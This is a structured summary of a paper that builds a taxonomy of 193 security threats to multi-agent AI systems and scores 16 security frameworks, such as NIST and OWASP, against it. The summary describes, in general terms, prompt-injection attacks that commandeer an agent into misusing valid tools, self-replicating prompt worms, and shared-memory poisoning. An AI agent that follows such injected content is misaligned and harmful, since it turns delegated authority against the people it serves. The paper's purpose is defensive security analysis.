Security Considerations for Multi-agent Systems

📝 Paper Summary

Multi-agent AI Safety & Security

This study establishes a taxonomy of 193 distinct security threats for Multi-Agent Systems and empirically demonstrates that current frameworks like NIST RMF fail to cover emerging risks such as inter-agent memory poisoning.

Core Problem

Existing security frameworks (e.g., NIST AI RMF, MITRE ATLAS) assume single-agent properties (statelessness, bounded trust, determinism), failing to address the emergent, behavioral attack surfaces introduced by multi-agent coordination.

Why it matters:

Enterprise deployments now delegate authority to agents that schedule cloud operations and manage finances; compromising them allows 'policy-level RCE' without code vulnerabilities
Multi-agent systems (MAS) share persistent memory and propagate context, allowing attacks like self-replicating prompt worms to spread across agent boundaries
Practitioners lack empirical data on which security frameworks actually cover these new agentic risks, leading to false confidence in traditional governance

Concrete Example: In a 'Policy-level RCE' attack, an adversary injects a prompt that manipulates an agent's reasoning to invoke a valid tool (e.g., 'download code') rather than exploiting a software bug. Traditional guards miss this because the final natural language output looks benign, yet the agent has been commandeered to execute a malicious workflow sequence.

Key Novelty

Comprehensive MAS Threat Taxonomy & Framework Gap Analysis

Systematically derives 193 specific multi-agent threats (e.g., 'Tool-mediated compromise', 'Approval Fatigue') distinct from single-agent risks via GenAI-assisted threat modeling
Quantitatively scores 16 major security frameworks (including NIST, OWASP, MITRE) against this new taxonomy to expose specific coverage gaps in areas like Non-Determinism and Data Leakage

Evaluation Highlights

OWASP Agentic Security Initiative leads all frameworks with 65.3% coverage of the identified MAS threats
Non-Determinism is the most under-addressed risk category, with a mean coverage score of only 1.231 out of 3 across all frameworks
Data Leakage risks in MAS (e.g., shared session context) are poorly covered, averaging a score of 1.340 out of 3

Breakthrough Assessment

9/10

Establishes the foundational taxonomy for the new field of Multi-Agent Security, exposing critical gaps in established standards like NIST and MITRE with rigorous empirical evidence.

⚙️ Technical Details

Problem Definition

Setting: Security assessment of Multi-Agent Systems (MAS) exercising delegated tool authority and shared memory

Inputs: 16 existing AI security frameworks (e.g., NIST AI RMF, OWASP ASI, MITRE ATLAS)

Outputs: Coverage scores (0-3 scale) against a taxonomy of 193 MAS-specific threat items

Pipeline Flow

Knowledge Base Construction (Phase 1) → Threat Modeling (Phase 2) → Survey Planning (Phase 3) → Framework Scoring (Phase 4)

System Modules

Knowledge Base Construction (Methodology)

Aggregate technical details of production MAS (graph-based orchestration, vector DBs, NeMo Guardrails) to ground analysis

Model or implementation: N/A (Human + Literature Aggregation)

GenAI Threat Modeling (Methodology)

Derive candidate threats by prompting models to reason adversarially about the knowledge base

Model or implementation: Generative AI Model (Specific model not named)

Survey Planning & Scoring (Methodology)

Map threats to literature and score existing frameworks against the taxonomy

Model or implementation: Human Analyst

Novel Architectural Elements

Four-phase evaluation pipeline integrating GenAI threat discovery with human expert validation
Taxonomy structure differentiating 'Structural' single-agent risks from 'Behavioral/Emergent' multi-agent risks

Comparison to Prior Work

vs. NIST AI RMF: Focuses specifically on emergent MAS risks (e.g., inter-agent trust) rather than general AI lifecycle risks
vs. MITRE ATLAS: identifying 'policy-level' attacks where no software vulnerability exists, whereas ATLAS focuses often on traditional adversarial ML
vs. Traditional AppSec: Addresses 'Policy-level RCE' where valid tool use is the attack vector, rather than code injection vulnerabilities

Limitations

Survey execution (Phase 4) is noted as 'currently underway' with early results presented
Relies on GenAI for initial threat discovery, potentially biasing results towards known LLM failure modes
Scoring of frameworks involves subjective interpretation of framework capabilities against threat items

Reproducibility

The methodology is described in detail, but the specific prompts used for GenAI threat modeling and the full dataset of 1,700 candidate threats are not explicitly linked in the text. The list of 16 frameworks is provided.

📊 Experiments & Results

Evaluation Setup

Comparative analysis of security frameworks against a proprietary taxonomy of 193 MAS threats

Benchmarks:

Security Frameworks List (Coverage Analysis) [New]

Metrics:

Coverage Score (0-3 scale per item)
Percentage Coverage (Overall)
Statistical methodology: Not explicitly reported in the paper

Key Results

Benchmark	Metric	Baseline	This Paper	Δ
Comparative scoring of frameworks reveals significant gaps in covering multi-agent specific threats.
MAS Threat Taxonomy	Coverage %	Not reported in the paper	65.3	Not reported in the paper
Non-Determinism Category	Mean Score (0-3)	2.00	1.231	-0.769
Data Leakage Category	Mean Score (0-3)	2.00	1.340	-0.660

Main Takeaways

No reviewed framework achieves majority coverage of any single risk category, indicating a systemic lack of readiness for MAS security
OWASP Agentic Security Initiative dominates the 'Design' phase coverage, while CDAO Toolkit leads in 'Development' and 'Operations'
Critical MAS-specific threats like 'Policy-level RCE' and 'Shared Memory Poisoning' are virtually unaddressed by traditional frameworks (NIST, MITRE)
Threats are classified into 9 categories (e.g., Agent-Tool Coupling, Trust Exploitation), with Non-Determinism being the weakest area across all frameworks

📚 Prerequisite Knowledge

Prerequisites

Understanding of Agentic AI architectures (ReAct, RAG, Tool use)
Familiarity with cybersecurity concepts (RCE, Injection, Privilege Escalation)
Knowledge of AI governance frameworks (NIST, OWASP)

Key Terms

MAS: Multi-Agent Systems—systems where multiple autonomous agents coordinate, share memory, and delegate tasks to achieve complex goals

Policy-level RCE: Policy-level Remote Code Execution—an attack where an adversary manipulates an agent's decision-making (policy) to misuse valid tools, achieving malicious effects without exploiting software vulnerabilities

OWASP ASI: OWASP Agentic Security Initiative—a security framework specifically focused on risks in agentic AI systems

RAG: Retrieval-Augmented Generation—agents searching external data to answer queries; in MAS, this introduces risks of poisoning shared knowledge bases

MIG: Multi-Instance GPU—hardware partitioning of GPUs; the paper notes vulnerabilities where shared physical components (power, thermal) breach this isolation

Sidecar Proxy: A helper container used in Kubernetes; in MAS, compromising this allows intercepting tool calls across an entire agent fleet

Prompt Injection: Malicious inputs designed to override an AI's instructions; in MAS, these can become self-replicating worms spreading between agents